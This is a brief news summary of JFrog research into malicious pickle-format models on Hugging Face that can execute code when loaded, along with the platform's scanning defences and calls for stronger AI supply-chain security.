Hugging Face, a prominent platform for AI model collaboration, faces potential security threats from malicious machine learning models that could lead to code execution attacks, with recent findings by the JFrog Security Research team highlighting this risk. A discovered malicious model utilized a payload to grant unauthorized access to compromised machines, posing a threat to users’ systems and potentially enabling data breaches or corporate espionage. The research emphasizes the vulnerabilities associated with certain model types, particularly those using the "pickle" format, which can execute arbitrary code upon loading. Hugging Face has implemented security measures like malware and pickle scanning to mitigate these threats, although some models still pose risks. The JFrog team has developed a scanning environment to detect and neutralize threats, and they advocate for the need for continuous vigilance and improved security frameworks in AI ecosystems. The incidents underscore the importance of safeguarding AI supply chains and highlight the role of initiatives like Huntr in enhancing the security of AI models and platforms.